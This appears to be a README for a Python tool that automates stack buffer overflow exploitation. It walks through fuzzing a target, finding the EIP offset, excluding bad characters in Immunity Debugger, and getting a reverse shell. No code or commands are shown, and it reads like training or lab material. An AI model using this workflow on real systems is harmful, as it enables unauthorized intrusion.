A tool for buffer overflow attacks
./BufferOverflowKiller.py
1. Change the destination ip address and port
2. Target program buffer overflow test
3. Get the program overflow boundary value
4. Exclude bad characters
5. Pwn the program and get the connection back shell
2. Fuzz test the parameters of the target program to see if there is a buffer overflow vulnerability
It is found that the range of program overflow is within 2000 characters, and then the detailed overflow boundary value of the program is tested.
Then we go to the Immunity Debugger tool to view the value of the eip register of the program and record it, here is 6F43396E
Then enter the value of the eip address
The program concludes that the verbose overflow boundary is 1978 characters
We just ran the fourth module, here we go directly to the Immunity Debugger tool to exclude bad characters
Here we can see what the bad characters of the program are, and then we can easily rule them out
Run the fifth module, enter the local ip, port, bad characters, return address of the program
Then we open another script and follow the supplementary script prompted by the program
Listen to the set port, then run the program to get the shell
The tool can execute linux commands normally when running
When testing the bad characters of the program, if there are many bad characters in the program, the test can be repeated, which is very convenient